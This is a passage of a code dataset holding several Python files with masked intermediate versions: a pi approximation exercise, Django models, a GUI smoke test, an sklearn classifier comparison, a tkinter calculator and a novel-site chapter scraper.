# File------------project2.py
# Developer-------Paige Weber
# Course----------CS1213-03
# Project---------Project #1
# Due-------------September 26, 2017
#
# This program uses Gregory-Leibniz series to compute
# an approximate value of pi.
#--------------------------------------------------------
number_of_terms = int(input("How many terms? "))
number_of_terms = number_of_terms + 1
if number_of_terms >= 1:
add_approximation = 0
for count in range (1, number_of_terms):
approximation = (((-1)**(count + 1))/(2 * count - 1))
add_approximation = approximation + add_approximation
solution = add_approximation * 4
print("Approxiation of pi: %1.5f"%solution)
else:
print("The number of terms must be greater than zero.")
|
normal
|
{
"blob_id": "466148395a4141793b5f92c84513fd093876db76",
"index": 9964,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif number_of_terms >= 1:\n add_approximation = 0\n for count in range(1, number_of_terms):\n approximation = (-1) ** (count + 1) / (2 * count - 1)\n add_approximation = approximation + add_approximation\n solution = add_approximation * 4\n print('Approxiation of pi: %1.5f' % solution)\nelse:\n print('The number of terms must be greater than zero.')\n",
"step-3": "number_of_terms = int(input('How many terms? '))\nnumber_of_terms = number_of_terms + 1\nif number_of_terms >= 1:\n add_approximation = 0\n for count in range(1, number_of_terms):\n approximation = (-1) ** (count + 1) / (2 * count - 1)\n add_approximation = approximation + add_approximation\n solution = add_approximation * 4\n print('Approxiation of pi: %1.5f' % solution)\nelse:\n print('The number of terms must be greater than zero.')\n",
"step-4": "#--------------------------------------------------------\n# File------------project2.py\n# Developer-------Paige Weber\n# Course----------CS1213-03\n# Project---------Project #1\n# Due-------------September 26, 2017\n#\n# This program uses Gregory-Leibniz series to compute\n# an approximate value of pi.\n#--------------------------------------------------------\nnumber_of_terms = int(input(\"How many terms? \"))\nnumber_of_terms = number_of_terms + 1\nif number_of_terms >= 1:\n\n add_approximation = 0\n\n for count in range (1, number_of_terms):\n approximation = (((-1)**(count + 1))/(2 * count - 1))\n add_approximation = approximation + add_approximation\n solution = add_approximation * 4\n\n print(\"Approxiation of pi: %1.5f\"%solution)\n\nelse:\n print(\"The number of terms must be greater than zero.\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django.contrib.auth.models import User
from django.core import validators
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.contrib.auth.models import Group
from django.conf import settings
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def assign_group(sender, instance, created, **kwargs):
"""Сигнал, добавляющий созданного пользователя в группу editors"""
if created:
editors_group = Group.objects.get(name='editors')
instance.groups.add(editors_group)
class Employee(models.Model):
"""Сотрудники"""
name = models.CharField("Имя", max_length=100)
age = models.PositiveSmallIntegerField("Возраст", validators=[validators.MaxValueValidator(120),
validators.MinValueValidator(18)])
position = models.CharField("Должность", max_length=60)
photo = models.ImageField("Фото", upload_to="employees/")
achievements = models.TextField("Достижения", max_length=2000,
help_text="Информация об образовании, опыте, квалификации и профессиональных достижениях")
def __str__(self):
return self.name
class Meta:
verbose_name = "Сотрудник"
verbose_name_plural = "Сотрудники"
class Category(models.Model):
"""Категории"""
name = models.CharField("Категория", max_length=150)
url = models.SlugField(max_length=160, unique=True)
def __str__(self):
return self.name
class Meta:
verbose_name = "Категория"
verbose_name_plural = "Категории"
class Service(models.Model):
"""Услуга"""
PERIOD = (
(0, ''),
(1, '6'),
(2, '12'),
(3, '24'),
)
title = models.CharField("Название", max_length=100)
description = models.TextField("Описание")
image = models.ImageField("Фото", upload_to="services/", null=True, blank=True)
employee = models.ManyToManyField(Employee, verbose_name="Cотрудник", related_name="service_employee")
category = models.ForeignKey(Category, verbose_name="Категория", on_delete=models.SET_NULL, null=True)
warranty = models.PositiveSmallIntegerField("Гарантийный срок", choices=PERIOD, help_text="Указать в месяцах")
price = models.DecimalField("Стоимость услуги", max_digits=9, decimal_places=2, default=0,
help_text="Указывать сумму в рублях", validators=[validators.MinValueValidator(0)])
url = models.SlugField(max_length=130, unique=True)
def __str__(self):
return self.title
class Meta:
verbose_name = "Услуга"
verbose_name_plural = "Услуги"
|
normal
|
{
"blob_id": "a139042d0c6fa4941b7149a33b0a48018e9f511b",
"index": 9003,
"step-1": "<mask token>\n\n\nclass Category(models.Model):\n \"\"\"Категории\"\"\"\n name = models.CharField('Категория', max_length=150)\n url = models.SlugField(max_length=160, unique=True)\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n\nclass Service(models.Model):\n \"\"\"Услуга\"\"\"\n PERIOD = (0, ''), (1, '6'), (2, '12'), (3, '24')\n title = models.CharField('Название', max_length=100)\n description = models.TextField('Описание')\n image = models.ImageField('Фото', upload_to='services/', null=True,\n blank=True)\n employee = models.ManyToManyField(Employee, verbose_name='Cотрудник',\n related_name='service_employee')\n category = models.ForeignKey(Category, verbose_name='Категория',\n on_delete=models.SET_NULL, null=True)\n warranty = models.PositiveSmallIntegerField('Гарантийный срок', choices\n =PERIOD, help_text='Указать в месяцах')\n price = models.DecimalField('Стоимость услуги', max_digits=9,\n decimal_places=2, default=0, help_text='Указывать сумму в рублях',\n validators=[validators.MinValueValidator(0)])\n url = models.SlugField(max_length=130, unique=True)\n\n def __str__(self):\n return self.title\n\n\n class Meta:\n verbose_name = 'Услуга'\n verbose_name_plural = 'Услуги'\n",
"step-2": "<mask token>\n\n\nclass Employee(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n verbose_name = 'Сотрудник'\n verbose_name_plural = 'Сотрудники'\n\n\nclass Category(models.Model):\n \"\"\"Категории\"\"\"\n name = models.CharField('Категория', max_length=150)\n url = models.SlugField(max_length=160, unique=True)\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n\nclass Service(models.Model):\n \"\"\"Услуга\"\"\"\n PERIOD = (0, ''), (1, '6'), (2, '12'), (3, '24')\n title = models.CharField('Название', max_length=100)\n description = models.TextField('Описание')\n image = models.ImageField('Фото', upload_to='services/', null=True,\n blank=True)\n employee = models.ManyToManyField(Employee, verbose_name='Cотрудник',\n related_name='service_employee')\n category = models.ForeignKey(Category, verbose_name='Категория',\n on_delete=models.SET_NULL, null=True)\n warranty = models.PositiveSmallIntegerField('Гарантийный срок', choices\n =PERIOD, help_text='Указать в месяцах')\n price = models.DecimalField('Стоимость услуги', max_digits=9,\n decimal_places=2, default=0, help_text='Указывать сумму в рублях',\n validators=[validators.MinValueValidator(0)])\n url = models.SlugField(max_length=130, unique=True)\n\n def __str__(self):\n return self.title\n\n\n class Meta:\n verbose_name = 'Услуга'\n verbose_name_plural = 'Услуги'\n",
"step-3": "<mask token>\n\n\nclass Employee(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name = 'Сотрудник'\n verbose_name_plural = 'Сотрудники'\n\n\nclass Category(models.Model):\n \"\"\"Категории\"\"\"\n name = models.CharField('Категория', max_length=150)\n url = models.SlugField(max_length=160, unique=True)\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n\nclass Service(models.Model):\n \"\"\"Услуга\"\"\"\n PERIOD = (0, ''), (1, '6'), (2, '12'), (3, '24')\n title = models.CharField('Название', max_length=100)\n description = models.TextField('Описание')\n image = models.ImageField('Фото', upload_to='services/', null=True,\n blank=True)\n employee = models.ManyToManyField(Employee, verbose_name='Cотрудник',\n related_name='service_employee')\n category = models.ForeignKey(Category, verbose_name='Категория',\n on_delete=models.SET_NULL, null=True)\n warranty = models.PositiveSmallIntegerField('Гарантийный срок', choices\n =PERIOD, help_text='Указать в месяцах')\n price = models.DecimalField('Стоимость услуги', max_digits=9,\n decimal_places=2, default=0, help_text='Указывать сумму в рублях',\n validators=[validators.MinValueValidator(0)])\n url = models.SlugField(max_length=130, unique=True)\n\n def __str__(self):\n return self.title\n\n\n class Meta:\n verbose_name = 'Услуга'\n verbose_name_plural = 'Услуги'\n",
"step-4": "from django.contrib.auth.models import User\nfrom django.core import validators\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.contrib.auth.models import Group\nfrom django.conf import settings\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef assign_group(sender, instance, created, **kwargs):\n \"\"\"Сигнал, добавляющий созданного пользователя в группу editors\"\"\"\n if created:\n editors_group = Group.objects.get(name='editors')\n instance.groups.add(editors_group)\n\n\nclass Employee(models.Model):\n \"\"\"Сотрудники\"\"\"\n name = models.CharField('Имя', max_length=100)\n age = models.PositiveSmallIntegerField('Возраст', validators=[\n validators.MaxValueValidator(120), validators.MinValueValidator(18)])\n position = models.CharField('Должность', max_length=60)\n photo = models.ImageField('Фото', upload_to='employees/')\n achievements = models.TextField('Достижения', max_length=2000,\n help_text=\n 'Информация об образовании, опыте, квалификации и профессиональных достижениях'\n )\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name = 'Сотрудник'\n verbose_name_plural = 'Сотрудники'\n\n\nclass Category(models.Model):\n \"\"\"Категории\"\"\"\n name = models.CharField('Категория', max_length=150)\n url = models.SlugField(max_length=160, unique=True)\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n\nclass Service(models.Model):\n \"\"\"Услуга\"\"\"\n PERIOD = (0, ''), (1, '6'), (2, '12'), (3, '24')\n title = models.CharField('Название', max_length=100)\n description = models.TextField('Описание')\n image = models.ImageField('Фото', upload_to='services/', null=True,\n blank=True)\n employee = models.ManyToManyField(Employee, verbose_name='Cотрудник',\n related_name='service_employee')\n category = models.ForeignKey(Category, verbose_name='Категория',\n on_delete=models.SET_NULL, null=True)\n warranty = models.PositiveSmallIntegerField('Гарантийный срок', choices\n =PERIOD, help_text='Указать в месяцах')\n price = models.DecimalField('Стоимость услуги', max_digits=9,\n decimal_places=2, default=0, help_text='Указывать сумму в рублях',\n validators=[validators.MinValueValidator(0)])\n url = models.SlugField(max_length=130, unique=True)\n\n def __str__(self):\n return self.title\n\n\n class Meta:\n verbose_name = 'Услуга'\n verbose_name_plural = 'Услуги'\n",
"step-5": "from django.contrib.auth.models import User\nfrom django.core import validators\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.contrib.auth.models import Group\n\nfrom django.conf import settings\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef assign_group(sender, instance, created, **kwargs):\n \"\"\"Сигнал, добавляющий созданного пользователя в группу editors\"\"\"\n\n if created:\n editors_group = Group.objects.get(name='editors')\n instance.groups.add(editors_group)\n\n\nclass Employee(models.Model):\n \"\"\"Сотрудники\"\"\"\n\n name = models.CharField(\"Имя\", max_length=100)\n age = models.PositiveSmallIntegerField(\"Возраст\", validators=[validators.MaxValueValidator(120),\n validators.MinValueValidator(18)])\n position = models.CharField(\"Должность\", max_length=60)\n photo = models.ImageField(\"Фото\", upload_to=\"employees/\")\n achievements = models.TextField(\"Достижения\", max_length=2000,\n help_text=\"Информация об образовании, опыте, квалификации и профессиональных достижениях\")\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = \"Сотрудник\"\n verbose_name_plural = \"Сотрудники\"\n\n\nclass Category(models.Model):\n \"\"\"Категории\"\"\"\n\n name = models.CharField(\"Категория\", max_length=150)\n url = models.SlugField(max_length=160, unique=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = \"Категория\"\n verbose_name_plural = \"Категории\"\n\n\nclass Service(models.Model):\n \"\"\"Услуга\"\"\"\n\n PERIOD = (\n (0, ''),\n (1, '6'),\n (2, '12'),\n (3, '24'),\n )\n\n title = models.CharField(\"Название\", max_length=100)\n description = models.TextField(\"Описание\")\n image = models.ImageField(\"Фото\", upload_to=\"services/\", null=True, blank=True)\n employee = models.ManyToManyField(Employee, verbose_name=\"Cотрудник\", related_name=\"service_employee\")\n category = models.ForeignKey(Category, verbose_name=\"Категория\", on_delete=models.SET_NULL, null=True)\n warranty = models.PositiveSmallIntegerField(\"Гарантийный срок\", choices=PERIOD, help_text=\"Указать в месяцах\")\n price = models.DecimalField(\"Стоимость услуги\", max_digits=9, decimal_places=2, default=0,\n help_text=\"Указывать сумму в рублях\", validators=[validators.MinValueValidator(0)])\n url = models.SlugField(max_length=130, unique=True)\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = \"Услуга\"\n verbose_name_plural = \"Услуги\"\n",
"step-ids": [
8,
9,
10,
14,
15
]
}
|
[
8,
9,
10,
14,
15
] |
from golem import actions
from projects.golem_gui.pages import common
from projects.golem_gui.pages import api
from projects.golem_gui.pages import test_builder_code
description = 'Verify the user can edit test code and save it'
tags = ['smoke']
def setup(data):
common.access_golem(data.env.url, data.env.admin)
api.project.using_project('test_builder_code')
data.test = api.test.create_access_test_code(data.project)
def test(data):
test_line = "description = 'desc'"
test_builder_code.set_value(test_line)
actions.click(test_builder_code.save_button)
common.assert_toast_message_is_displayed('Test ' + data.test + ' saved')
actions.refresh_page()
test_builder_code.assert_value(test_line)
|
normal
|
{
"blob_id": "d4cdc4f1995eab7f01c970b43cb0a3c5ed4a2711",
"index": 3673,
"step-1": "<mask token>\n\n\ndef setup(data):\n common.access_golem(data.env.url, data.env.admin)\n api.project.using_project('test_builder_code')\n data.test = api.test.create_access_test_code(data.project)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef setup(data):\n common.access_golem(data.env.url, data.env.admin)\n api.project.using_project('test_builder_code')\n data.test = api.test.create_access_test_code(data.project)\n\n\ndef test(data):\n test_line = \"description = 'desc'\"\n test_builder_code.set_value(test_line)\n actions.click(test_builder_code.save_button)\n common.assert_toast_message_is_displayed('Test ' + data.test + ' saved')\n actions.refresh_page()\n test_builder_code.assert_value(test_line)\n",
"step-3": "<mask token>\ndescription = 'Verify the user can edit test code and save it'\ntags = ['smoke']\n\n\ndef setup(data):\n common.access_golem(data.env.url, data.env.admin)\n api.project.using_project('test_builder_code')\n data.test = api.test.create_access_test_code(data.project)\n\n\ndef test(data):\n test_line = \"description = 'desc'\"\n test_builder_code.set_value(test_line)\n actions.click(test_builder_code.save_button)\n common.assert_toast_message_is_displayed('Test ' + data.test + ' saved')\n actions.refresh_page()\n test_builder_code.assert_value(test_line)\n",
"step-4": "from golem import actions\nfrom projects.golem_gui.pages import common\nfrom projects.golem_gui.pages import api\nfrom projects.golem_gui.pages import test_builder_code\ndescription = 'Verify the user can edit test code and save it'\ntags = ['smoke']\n\n\ndef setup(data):\n common.access_golem(data.env.url, data.env.admin)\n api.project.using_project('test_builder_code')\n data.test = api.test.create_access_test_code(data.project)\n\n\ndef test(data):\n test_line = \"description = 'desc'\"\n test_builder_code.set_value(test_line)\n actions.click(test_builder_code.save_button)\n common.assert_toast_message_is_displayed('Test ' + data.test + ' saved')\n actions.refresh_page()\n test_builder_code.assert_value(test_line)\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
from sklearn import svm, metrics, tree
from sklearn.ensemble import AdaBoostClassifier
from sklearn.neighbors import KNeighborsClassifier
import numpy as np
my_data = np.loadtxt('edited_data/dataset_regression_edited.csv',delimiter=',', dtype='str')
training_data = my_data[:, 0:6]
validation_data = my_data[:, 6]
classifiers = [
tree.DecisionTreeClassifier(max_depth=5),
tree.DecisionTreeClassifier(max_depth=8),
tree.DecisionTreeClassifier(max_depth=10),
svm.SVC(kernel='linear'),
svm.SVC(kernel='rbf'),
AdaBoostClassifier(n_estimators=50),
AdaBoostClassifier(n_estimators=100),
KNeighborsClassifier(3),
KNeighborsClassifier(5),
KNeighborsClassifier(7)
]
for classifier in classifiers:
classifier.fit(training_data[:1500], validation_data[:1500])
expected = validation_data[681:]
predicted = classifier.predict(training_data[681:])
print("Classification report for classifier %s:\n%s\n"
% (classifier, metrics.classification_report(expected, predicted)))
print("Confusion matrix:\n%s" % metrics.confusion_matrix(expected, predicted))
|
normal
|
{
"blob_id": "3024359710148bfbb15677973555f214b1f878b7",
"index": 1521,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor classifier in classifiers:\n classifier.fit(training_data[:1500], validation_data[:1500])\n expected = validation_data[681:]\n predicted = classifier.predict(training_data[681:])\n print('Classification report for classifier %s:\\n%s\\n' % (classifier,\n metrics.classification_report(expected, predicted)))\n print('Confusion matrix:\\n%s' % metrics.confusion_matrix(expected,\n predicted))\n",
"step-3": "<mask token>\nmy_data = np.loadtxt('edited_data/dataset_regression_edited.csv', delimiter\n =',', dtype='str')\ntraining_data = my_data[:, 0:6]\nvalidation_data = my_data[:, 6]\nclassifiers = [tree.DecisionTreeClassifier(max_depth=5), tree.\n DecisionTreeClassifier(max_depth=8), tree.DecisionTreeClassifier(\n max_depth=10), svm.SVC(kernel='linear'), svm.SVC(kernel='rbf'),\n AdaBoostClassifier(n_estimators=50), AdaBoostClassifier(n_estimators=\n 100), KNeighborsClassifier(3), KNeighborsClassifier(5),\n KNeighborsClassifier(7)]\nfor classifier in classifiers:\n classifier.fit(training_data[:1500], validation_data[:1500])\n expected = validation_data[681:]\n predicted = classifier.predict(training_data[681:])\n print('Classification report for classifier %s:\\n%s\\n' % (classifier,\n metrics.classification_report(expected, predicted)))\n print('Confusion matrix:\\n%s' % metrics.confusion_matrix(expected,\n predicted))\n",
"step-4": "from sklearn import svm, metrics, tree\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nimport numpy as np\nmy_data = np.loadtxt('edited_data/dataset_regression_edited.csv', delimiter\n =',', dtype='str')\ntraining_data = my_data[:, 0:6]\nvalidation_data = my_data[:, 6]\nclassifiers = [tree.DecisionTreeClassifier(max_depth=5), tree.\n DecisionTreeClassifier(max_depth=8), tree.DecisionTreeClassifier(\n max_depth=10), svm.SVC(kernel='linear'), svm.SVC(kernel='rbf'),\n AdaBoostClassifier(n_estimators=50), AdaBoostClassifier(n_estimators=\n 100), KNeighborsClassifier(3), KNeighborsClassifier(5),\n KNeighborsClassifier(7)]\nfor classifier in classifiers:\n classifier.fit(training_data[:1500], validation_data[:1500])\n expected = validation_data[681:]\n predicted = classifier.predict(training_data[681:])\n print('Classification report for classifier %s:\\n%s\\n' % (classifier,\n metrics.classification_report(expected, predicted)))\n print('Confusion matrix:\\n%s' % metrics.confusion_matrix(expected,\n predicted))\n",
"step-5": "from sklearn import svm, metrics, tree\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nimport numpy as np\n\n\nmy_data = np.loadtxt('edited_data/dataset_regression_edited.csv',delimiter=',', dtype='str')\n\ntraining_data = my_data[:, 0:6]\nvalidation_data = my_data[:, 6]\n\n\nclassifiers = [\n tree.DecisionTreeClassifier(max_depth=5),\n tree.DecisionTreeClassifier(max_depth=8),\n tree.DecisionTreeClassifier(max_depth=10),\n svm.SVC(kernel='linear'),\n svm.SVC(kernel='rbf'),\n AdaBoostClassifier(n_estimators=50),\n AdaBoostClassifier(n_estimators=100),\n KNeighborsClassifier(3),\n KNeighborsClassifier(5),\n KNeighborsClassifier(7)\n]\n\n\nfor classifier in classifiers:\n classifier.fit(training_data[:1500], validation_data[:1500])\n expected = validation_data[681:]\n predicted = classifier.predict(training_data[681:])\n print(\"Classification report for classifier %s:\\n%s\\n\"\n % (classifier, metrics.classification_report(expected, predicted)))\n print(\"Confusion matrix:\\n%s\" % metrics.confusion_matrix(expected, predicted))\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#GUIcal.py
from tkinter import *
from tkinter import ttk
import math
GUI=Tk()
GUI.title('My Cal Program')
GUI.geometry('500x500')
def calc():
height=v_height.get()
base=v_base.get()#ดึงค่ามาจากv_base
print(f'height is {height}')
print(f'Basal length is {base}')
length= math.isqrt((height*height)+(base*base))
print('Lenght is {:.2f}'.format(length))
###For attach picture
'''
IMG=PhotoImage(file='pythagorus-theorem.png').subsample(3)
IM1=Label(GUI,image=IMG)
IM1.pack()
'''
v_height=IntVar()
v_base=IntVar()
L1=Label(text='Please input height',foreground='red',font=('Angsana New',15))
L1.pack()
E1=ttk.Entry(GUI,textvariable=v_height)
E1.pack(pady=8,ipady=7,ipadx=17)
L2=Label(text='Please input basal length',foreground='red',font=('Angsana New',15))
L2.pack()
E2=ttk.Entry(GUI,textvariable=v_base)
E2.pack(pady=8,ipady=7,ipadx=17)
B1=ttk.Button(text='Calculate',command=calc)
B1.pack()
v_result=StringVar()
v_result.set('----Result----')
Result=ttk.Label(GUI,textvariable=v_result,foreground='green',font=('Angsana New',15))
Result.pack()
GUI.mainloop()
|
normal
|
{
"blob_id": "77d7fb49ed4c3e78b148cd446e9a5c6a0e6fac8b",
"index": 835,
"step-1": "<mask token>\n\n\ndef calc():\n height = v_height.get()\n base = v_base.get()\n print(f'height is {height}')\n print(f'Basal length is {base}')\n length = math.isqrt(height * height + base * base)\n print('Lenght is {:.2f}'.format(length))\n\n\n<mask token>\n",
"step-2": "<mask token>\nGUI.title('My Cal Program')\nGUI.geometry('500x500')\n\n\ndef calc():\n height = v_height.get()\n base = v_base.get()\n print(f'height is {height}')\n print(f'Basal length is {base}')\n length = math.isqrt(height * height + base * base)\n print('Lenght is {:.2f}'.format(length))\n\n\n<mask token>\nL1.pack()\n<mask token>\nE1.pack(pady=8, ipady=7, ipadx=17)\n<mask token>\nL2.pack()\n<mask token>\nE2.pack(pady=8, ipady=7, ipadx=17)\n<mask token>\nB1.pack()\n<mask token>\nv_result.set('----Result----')\n<mask token>\nResult.pack()\nGUI.mainloop()\n",
"step-3": "<mask token>\nGUI = Tk()\nGUI.title('My Cal Program')\nGUI.geometry('500x500')\n\n\ndef calc():\n height = v_height.get()\n base = v_base.get()\n print(f'height is {height}')\n print(f'Basal length is {base}')\n length = math.isqrt(height * height + base * base)\n print('Lenght is {:.2f}'.format(length))\n\n\n<mask token>\nv_height = IntVar()\nv_base = IntVar()\nL1 = Label(text='Please input height', foreground='red', font=(\n 'Angsana New', 15))\nL1.pack()\nE1 = ttk.Entry(GUI, textvariable=v_height)\nE1.pack(pady=8, ipady=7, ipadx=17)\nL2 = Label(text='Please input basal length', foreground='red', font=(\n 'Angsana New', 15))\nL2.pack()\nE2 = ttk.Entry(GUI, textvariable=v_base)\nE2.pack(pady=8, ipady=7, ipadx=17)\nB1 = ttk.Button(text='Calculate', command=calc)\nB1.pack()\nv_result = StringVar()\nv_result.set('----Result----')\nResult = ttk.Label(GUI, textvariable=v_result, foreground='green', font=(\n 'Angsana New', 15))\nResult.pack()\nGUI.mainloop()\n",
"step-4": "from tkinter import *\nfrom tkinter import ttk\nimport math\nGUI = Tk()\nGUI.title('My Cal Program')\nGUI.geometry('500x500')\n\n\ndef calc():\n height = v_height.get()\n base = v_base.get()\n print(f'height is {height}')\n print(f'Basal length is {base}')\n length = math.isqrt(height * height + base * base)\n print('Lenght is {:.2f}'.format(length))\n\n\n<mask token>\nv_height = IntVar()\nv_base = IntVar()\nL1 = Label(text='Please input height', foreground='red', font=(\n 'Angsana New', 15))\nL1.pack()\nE1 = ttk.Entry(GUI, textvariable=v_height)\nE1.pack(pady=8, ipady=7, ipadx=17)\nL2 = Label(text='Please input basal length', foreground='red', font=(\n 'Angsana New', 15))\nL2.pack()\nE2 = ttk.Entry(GUI, textvariable=v_base)\nE2.pack(pady=8, ipady=7, ipadx=17)\nB1 = ttk.Button(text='Calculate', command=calc)\nB1.pack()\nv_result = StringVar()\nv_result.set('----Result----')\nResult = ttk.Label(GUI, textvariable=v_result, foreground='green', font=(\n 'Angsana New', 15))\nResult.pack()\nGUI.mainloop()\n",
"step-5": "#GUIcal.py\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nimport math\r\n\r\nGUI=Tk()\r\nGUI.title('My Cal Program')\r\nGUI.geometry('500x500')\r\n\r\ndef calc():\r\n\theight=v_height.get()\r\n\tbase=v_base.get()#ดึงค่ามาจากv_base\r\n\tprint(f'height is {height}')\r\n\tprint(f'Basal length is {base}')\r\n\tlength= math.isqrt((height*height)+(base*base))\r\n\tprint('Lenght is {:.2f}'.format(length))\r\n\t\r\n###For attach picture\r\n'''\r\nIMG=PhotoImage(file='pythagorus-theorem.png').subsample(3)\r\nIM1=Label(GUI,image=IMG)\r\nIM1.pack()\r\n'''\r\nv_height=IntVar()\r\nv_base=IntVar()\r\n\r\nL1=Label(text='Please input height',foreground='red',font=('Angsana New',15))\r\nL1.pack()\r\nE1=ttk.Entry(GUI,textvariable=v_height)\r\nE1.pack(pady=8,ipady=7,ipadx=17)\r\n\r\n\r\nL2=Label(text='Please input basal length',foreground='red',font=('Angsana New',15))\r\nL2.pack()\r\nE2=ttk.Entry(GUI,textvariable=v_base)\r\nE2.pack(pady=8,ipady=7,ipadx=17)\r\n\r\n\r\nB1=ttk.Button(text='Calculate',command=calc)\r\nB1.pack()\r\n\r\nv_result=StringVar()\r\nv_result.set('----Result----')\r\nResult=ttk.Label(GUI,textvariable=v_result,foreground='green',font=('Angsana New',15))\r\nResult.pack()\r\n\r\nGUI.mainloop()\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding:utf-8 -*-
import requests
from lxml import etree
import codecs
from transfrom import del_extra
import re
MODIFIED_TEXT = [r'一秒记住.*?。', r'(看书.*?)', r'纯文字.*?问', r'热门.*?>', r'最新章节.*?新',
r'は防§.*?e', r'&.*?>', r'r.*?>', r'c.*?>',
r'复制.*?>', r'字-符.*?>', r'最新最快,无.*?。',
r' .Shumilou.Co M.Shumilou.Co<br /><br />', r'[Ww]{3}.*[mM]',
r'&nbsp; &nbsp; &nbsp; &nbsp; ']
HEADER = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 '}
URL = 'http://www.xxbiquge.com/5_5422/'
def crawl_urls(u):
response = requests.get(u, headers=HEADER)
body = etree.HTML(response.content)
content_urls = body.xpath('//div[@class="box_con"]/div/dl//dd/a/@href')
for pk_id, u in enumerate(content_urls):
content_url = 'http://www.xxbiquge.com' + u
yield pk_id, content_url
def crwal(content_url):
""" 爬出目标网站的目标文章,并过滤文章"""
content_response = requests.get(content_url, headers=HEADER)
content_body = etree.HTML(content_response.content)
try:
chapter = content_body.xpath('//div[@class="bookname"]/h1/text()')[0]
content = content_body.xpath('//div[@id="content"]')[0]
except IndexError:
raise IndexError('rules haved change in %s' % content_url)
final_content, need_confirm = transform_content(etree.tounicode(content))
final_content = content_filter(final_content)
return chapter, final_content, need_confirm
def transform_content(txt):
need_confirm = 0
if 'div' in txt:
txt = txt.split('<div id="content">')[-1].split('</div>')[0]
if len(txt) > 0:
while True:
if txt.startswith(' ') or txt.startswith(' '):
break
if '\u4e00' <= txt[0] <= '\u9fff':
break
txt = txt[1:]
txt = del_extra(txt)
if '\\' in txt or len(txt) < 100:
need_confirm = 1
return txt, need_confirm
def content_filter(content):
""" 正则去除文章中间的广告,乱码"""
m_content = content
for ccc in MODIFIED_TEXT:
m_content = re.sub(ccc, '', m_content)
return m_content
if __name__ == '__main__':
pass
|
normal
|
{
"blob_id": "7539042b92a5188a11f625cdfc0f341941f751f0",
"index": 6937,
"step-1": "<mask token>\n\n\ndef crawl_urls(u):\n response = requests.get(u, headers=HEADER)\n body = etree.HTML(response.content)\n content_urls = body.xpath('//div[@class=\"box_con\"]/div/dl//dd/a/@href')\n for pk_id, u in enumerate(content_urls):\n content_url = 'http://www.xxbiquge.com' + u\n yield pk_id, content_url\n\n\ndef crwal(content_url):\n \"\"\" 爬出目标网站的目标文章,并过滤文章\"\"\"\n content_response = requests.get(content_url, headers=HEADER)\n content_body = etree.HTML(content_response.content)\n try:\n chapter = content_body.xpath('//div[@class=\"bookname\"]/h1/text()')[0]\n content = content_body.xpath('//div[@id=\"content\"]')[0]\n except IndexError:\n raise IndexError('rules haved change in %s' % content_url)\n final_content, need_confirm = transform_content(etree.tounicode(content))\n final_content = content_filter(final_content)\n return chapter, final_content, need_confirm\n\n\ndef transform_content(txt):\n need_confirm = 0\n if 'div' in txt:\n txt = txt.split('<div id=\"content\">')[-1].split('</div>')[0]\n if len(txt) > 0:\n while True:\n if txt.startswith('\\xa0') or txt.startswith('\\u3000'):\n break\n if '一' <= txt[0] <= '鿿':\n break\n txt = txt[1:]\n txt = del_extra(txt)\n if '\\\\' in txt or len(txt) < 100:\n need_confirm = 1\n return txt, need_confirm\n\n\ndef content_filter(content):\n \"\"\" 正则去除文章中间的广告,乱码\"\"\"\n m_content = content\n for ccc in MODIFIED_TEXT:\n m_content = re.sub(ccc, '', m_content)\n return m_content\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef crawl_urls(u):\n response = requests.get(u, headers=HEADER)\n body = etree.HTML(response.content)\n content_urls = body.xpath('//div[@class=\"box_con\"]/div/dl//dd/a/@href')\n for pk_id, u in enumerate(content_urls):\n content_url = 'http://www.xxbiquge.com' + u\n yield pk_id, content_url\n\n\ndef crwal(content_url):\n \"\"\" 爬出目标网站的目标文章,并过滤文章\"\"\"\n content_response = requests.get(content_url, headers=HEADER)\n content_body = etree.HTML(content_response.content)\n try:\n chapter = content_body.xpath('//div[@class=\"bookname\"]/h1/text()')[0]\n content = content_body.xpath('//div[@id=\"content\"]')[0]\n except IndexError:\n raise IndexError('rules haved change in %s' % content_url)\n final_content, need_confirm = transform_content(etree.tounicode(content))\n final_content = content_filter(final_content)\n return chapter, final_content, need_confirm\n\n\ndef transform_content(txt):\n need_confirm = 0\n if 'div' in txt:\n txt = txt.split('<div 